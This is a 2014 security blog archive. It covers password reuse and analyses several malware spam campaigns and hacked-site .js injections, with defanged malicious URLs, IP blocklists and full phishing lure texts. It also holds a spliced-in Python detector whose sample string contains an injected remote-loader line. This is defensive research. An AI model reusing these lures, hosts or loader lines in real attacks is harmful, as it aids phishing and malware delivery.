
Wednesday 22 January 2014

Password hand-wringing misses the point

Recently doing the rounds of news outlets is a list compiled by SplashData of weak passwords found in data breaches in 2013. There's nothing wrong with this list, but as ever, the media completely miss the point.

SplashData's list is as follows:

Rank  Password     Change from 2012
1     123456       Up 1
2     password     Down 1
3     12345678     Unchanged
4     qwerty       Up 1
5     abc123       Down 1
6     123456789    New
7     111111       Up 2
8     1234567      Up 5
9     iloveyou     Up 2
10    adobe123     New
11    123123       Up 5
12    admin        New
13    1234567890   New
14    letmein      Down 7
15    photoshop    New
16    1234         New
17    monkey       Down 11
18    shadow       Unchanged
19    sunshine     Down 5
20    12345        New
21    password1    Up 4
22    princess     New
23    azerty       New
24    trustno1     Down 12
25    000000       New

The presence of "adobe123" and "photoshop" as passwords shows the influence of the Adobe data breach on the list. Back in 2010 when Gawker was breached, one of the popular passwords was.. you guessed it.. "gawker".

The media has a habit of picking up the wrong point.. they look at a password of "123456" and ask how anyone can be so stupid as to use it? But my somewhat NSFW response is: what the fuck does it matter?

Almost everything these days requires registration for which you need to supply an email address and password, and often for trivial things. One of the reasons that gawker featured so highly in the Gawker breach was that to the vast majority of users it matters not one jot if someone hacks into their account. The same is true for a lot of Adobe users.. in most cases the accounts are of absolutely no value to an attacker, so it really doesn't matter if you have adobe123 as a password or not.

So, the media (or at least some of it) says that you should choose a secure password such as fJ4C62GY0I8C15D but their advice is misleading because the real problem is password re-use and not the security of the password per se.

Despite the obvious security problems in doing so, many sites store passwords in plain text or in an insufficiently encrypted format. In these cases, it doesn't matter how secure your password is because the attackers will just be able to read it. Even in cases where the password is encrypted, with enough time and/or rainbow tables the password can often be determined, even if it is a complex one.

And if you have re-used that email address and password on other sites.. well, you're buggered basically.

In an ideal world, you would have a nicely secure password for each site and you would remember it in your head. But of course, that's practically impossible, so one option is to use a password manager (SplashData themselves make these) to remember them all for you. There are several different password managers available, but of course there is always the possibility that one of these tools might get hacked itself which could be catastrophic for users.

If you don't want to use a password manager, then you'll have to do it the old-fashioned way, and either remember your passwords or store them in some other manner. You should always have a secure and unique password for your web mail, banking/finance, work and major shopping sites. But for all the cruft that you have to register for, there's probably little harm in using a password that is easy to remember. Does it matter if the password I use for ranting at the BBC is abc123? Perhaps it doesn't.

But perhaps one problem is that there are simply too many times that you have to create an account in the first place. Sometimes it is nice to come across a retailer (for example) that will allow you to order stuff without creating a damned account.. something that seems to go against the grain, but it does mean that there's one less password to worry about..

Tuesday 21 January 2014

Something evil on 5.254.96.240 and 185.5.55.75

This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I do have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank.


URLquery shows one such download in this example. The victim has been directed to [donotclick]gf-58.ru/telekom_deutschland, which downloads a ZIP file Rechnungsruckstande_9698169830015295.zip containing a malicious executable Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe, which has a VirusTotal detection rate of 7/48.


The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server (according to URLquery and VirusTotal) are:

[donotclick]gdevseesti.ru/telekom_deutschland/
[donotclick]gdevseesti.ru/vodafone_online/
[donotclick]gf-58.ru/telekom_deutschland/
[donotclick]gf-58.ru/volksbank_eg/
[donotclick]goodwebtut.ru/fiducia/
[donotclick]goodwebtut.ru/telekom_deutschland/
[donotclick]goodwebtut.ru/vodafone_online/
[donotclick]mnogovsegotut.ru/fiducia/
[donotclick]uiuim.ru/fiducia/

The Anubis report and ThreatExpert report [pdf] show that the malware calls home to dshfyyst.ru on 185.5.55.75 (UAB "Interneto vizija", Lithuania). There are some other suspect sites on the same server which may be worth blocking (see below).

All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.

Recommended blocklist:
5.254.96.240
gf-58.ru
uiuim.ru
okkurp.ru
gdevseesti.ru
goodwebtut.ru
mnogovsegotut.ru
185.5.55.75
gossldirect.ru
dshfyyst.ru

Update: this appears to be Cridex aka Feodo, read more.

Monday 20 January 2014

WhatsApp "A friend of yours has just sent you a pic" spam

This fake WhatsApp spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From:      WhatsApp [{messages@whatsapp.com}]
Subject:      A friend of yours has just sent you a pic

Hey!

Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.

© 2013 WhatsApp Inc

Attached to the message is an archive file IMG9900882.zip which in turn contains a malicious executable IMG9900882.exe which has a VirusTotal detection rate of 20/49. The Malwr analysis gives few clues as to what the malware does, and other automated analysis tools are inconclusive.

"Thank you for scheduling a payment to Bill Me Later" spam

This fake Bill Me Later spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From:      Bill Me Later [service@paypal.com]
Subject:      Thank you for scheduling a payment to Bill Me Later

BillMeLater

Log in here

Your Bill Me Later® statement is now available!

Dear Customer,

Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.

For more details please check attached file

Summary:

Your Bill Me Later Account Number Ending in: 0266

You Paid: $1603.57

Your Payment Date*: 01/20/2014

Your Payment Confirmation Number: 971892583971968191

Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.

BillMeLater

*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.

Bill Me Later accounts are issued by WebBank, Salt Lake City Utah

PQW688PP1

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45. Automated analysis tools [1] [2] show an attempted connection to jatit.org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site.

Thursday 16 January 2014

"ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)" spam

This spam with a lengthy subject has a malicious attachment:

Date:      Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority:      High Priority 2

This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.

Record ID: HJRQY9PSXBSK334

Supplier: http://[victimdomain.com]

Invoice No.: 5644366804

Document No.: 3319683775

Invoice amount: USD 0488.21

Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48. The Malwr analysis shows an attempted connection to centrum.co.id on 75.98.233.44 (Ceranet, US). This is the only site on that server, so blocking either the IP or the domain might be useful.

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:


What has happened is that somehow an attacker has altered several .js files on the victim's site and appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor.de/assets/rollover.js as follows:


In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some other party other than Adscend Media LLC may be responsible. This link comes up black when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.
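As an added example (not code from the original post), here is a small Python check a site owner could run over their own .js files to spot the kind of tampering described above: a hash mismatch against a known-good copy, plus a reference to a remote loader of the shape seen in these attacks (an eight-character alphanumeric .php name with a numeric id= parameter on a hijacked host). The file contents it scans are constructed; the known-bad host list is taken from the URLs quoted in this post.

```python
import hashlib
import re

# Added example, not code from the original post. It checks a site's own
# .js files for two signs of the tampering described above: the file no
# longer matches its known-good hash, and it now references a remote
# loader URL of the shape seen in these attacks. Sample contents below
# are constructed.

# Hijacked hosts named in the post; a practitioner would feed in their own list.
KNOWN_BAD_HOSTS = {"ghionmedia.com", "berriesarsuiz.com", "www.karsons.co.uk"}

# http://<host>/<optional path>/<8 alphanumerics>.php?id=<digits>
INJECT_URL_RE = re.compile(
    r"https?://[A-Za-z0-9.\-]+/(?:[\w\-/]+/)?[A-Za-z0-9]{8}\.php\?id=\d+"
)


def sha256_hex(text):
    """Hex SHA-256 of a file's text; record this for each known-good .js file."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_injected_urls(js_text):
    """Return every URL in js_text that matches the injected-loader pattern."""
    return INJECT_URL_RE.findall(js_text)


def host_of(url):
    """Extract the host part of an http(s) URL."""
    return re.match(r"https?://([^/]+)/", url).group(1)


def check_js_file(js_text, baseline_sha256):
    """Compare a .js file against its baseline hash and scan it for loader URLs.

    Returns a dict: modified (hash mismatch), urls (pattern matches found) and
    known_bad (hosts from those URLs that appear on the blocklist).
    """
    urls = find_injected_urls(js_text)
    hosts = [host_of(u) for u in urls]
    return {
        "modified": sha256_hex(js_text) != baseline_sha256,
        "urls": urls,
        "known_bad": sorted({h for h in hosts if h in KNOWN_BAD_HOSTS}),
    }


# Constructed stand-in for a site's legitimate rollover.js.
CLEAN_JS = "function swap(img, src) { img.src = src; }\n"

# The same file with a loader appended, modelled on the injection described above.
INJECTED_JS = CLEAN_JS + (
    "var s = document.createElement('script');\n"
    "s.src = 'http://ghionmedia.com/PROjes/goar2RAn.php?id=56356336';\n"
    "document.getElementsByTagName('head')[0].appendChild(s);\n"
)

if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_JS)
    print(check_js_file(CLEAN_JS, baseline))
    print(check_js_file(INJECTED_JS, baseline))
```

Run it against a baseline of hashes taken when the site was last known to be clean; a hash mismatch with no pattern match still deserves a manual look, since the loader URL format may change between campaigns.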

Cushion Redirect sites using hijacked GoDaddy domains to block

A very quick write-up about some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine), which appears to be hosting some Cushion Redirect domains (explained here) that are being injected into certain sites, such as the one in this URLquery report.

A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects:

d6ld9uir6jgsgasgtfpoff7.yourchicagohummerlimo.com
ht6u1tyyljcketu4b938smf50395383e2197583fa67bd84d474af039.yourbestpartybus.com
770pa3hd21uo1q7wqa5thgh.amateurloginfree.com
d6ld9uir6jgsgasgtfpoff74159538404f0858918145d34c8200d5a7.yourchicagohummerlimo.com
xxctp7yqtwncubsewi6t7pp.yourchicagocarservice.com
63t31l30mdhlep1d0kx82tn70845384049a336c6dc8d7ede92b1d341.yourchicagogranite.com
qxwnnzei6redpxlwbfz1cxg.amateurloginfree.com
ht6u1tyyljcketu4b938smf.amateurloginfree.com
ht6u1tyyljcketu4b938smf50395383e20f64a2782cfdac4ee94285a.yourbestpartybus.com
y1ji3w0l1teth2ydh2k0epj.allgaysitespassfree.com

The hijacked GoDaddy domains in question are:
allgaysitespassfree.com
amateurloginfree.com
yourchicagocarservice.com
yourchicagogranite.com
yourchicagohummerlimo.com
yourbestpartybus.com

A quick look at the Google stats for AS42655 indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, ilmeteo.it is the 29th most popular site in Italy and the 1305th most popular worldwide.

This URLquery report shows the scripts with the injected code:


The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

Wednesday 15 January 2014

Staples "Your order is awaiting verification!" spam

This fake Staples spam has a malicious attachment:

Date:      Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From:      Staples Advantage Orders [Order@staplesadvantage.com]
Subject:      Your order is awaiting verification!

Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #:     5079728
Order Date and Eastern Time:     2/19/2013 12:28 PM
Order Total:     $152.46

This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance.
For Staples Advantage Support, call 1-800-633-6080 or email Support@staplesadvantage.com.

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools.

Tuesday 14 January 2014

PG&E "Gas and Electric Usage Statement" spam


This fake spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..

From:     PG&E [do_not_reply@sourcefort.com]
Reply-To: PG&E [do_not_reply@sourcefort.com]
Date:     14 January 2014 22:37
Subject:     Gas and Electric Usage Statement

PG & E ENERGY STATEMENT             Account No: 718198305-5
                                                Statement Date: 01/10/2014
                                                Due Date: 02/01/2014
Your Account Summary

Amount Due on Previous Statement           $344.70

Payment(s) Recieved Since Last Statement   0.0 

Previous Unpaid Balance                    $344.70

Current Electric Charges                   $165.80
Current Gas Charges                        49.20   

Total Amount Due BY 02/01/2014 $559.7

To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement.
To give PG&E full credit, they have a link on their homepage about it and a full warning here. These scam emails seem to have been doing the rounds for quite a few days now.

"Uncensored download" spam leads to adware

I've been plagued with these over the past few days, emails coming in with the following subjects:

Underground XXX files
Free porno torrents
Uncensored download


The body text contains just a link to [donotclick]goinst.com/download/getfile/1205000/0/?q=Uncensored%20download

In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" scrawled on the side. In blood.

A quick look at the EXE in VirusTotal indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably not behind the spam run, but are probably inadvertently paying the spammers for installations.

A Malwr analysis of the file can be found here.

Avoid.

HSBC "Payment Advice" spam / Payment Advice.exe


This fake HSBC spam comes with a malicious attachment:

Date:      Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From:      HSBC Advising Service [advising.service.738805677.728003.693090157@mail.hsbcnet.hsbc.com]
Subject:      Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]


Sir/Madam

The attached payment advice is issued at the request of our customer. The advice is for your reference only.

Yours faithfully

Global Payments and Cash Management

HSBC

***************************************************************************

This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

***************************************************************************

This e-mail is confidential. It may also be legally privileged. If you are not the addressee you may not copy, forward, disclose or use any part of it. If you have received this message in error, please delete it and all copies from your system and notify the sender immediately by return e-mail.

***************************************************************************

"SAVE PAPER - THINK BEFORE YOU PRINT!"

There is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48. Automated analysis by Comodo CAMAS shows an attempted connection to thebostonshaker.com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, so blocking either temporarily may give some protection.

Monday 13 January 2014

"Department of Treasury Notice of Outstanding Obligation" spam

This US Treasury spam (but apparently sent from salesforce.com) has a malicious attachment:

Date:      Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL

Important  please review and sign the attached document!

We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.

In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue.  Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Questions should be directed to the Federal Service Desk at:

http://www.bpn.gov/ccr/Help.aspx
Phone : 1-866-606-5048
Int. Phone 1-344-206-5406 for international calls
For DSN, dial 809-463-3029. Wait for a dial tone, and then dial 866-606-5472.

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47). The Malwr analysis shows an attempted connection to anggun.my.id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, so blocking either may be prudent.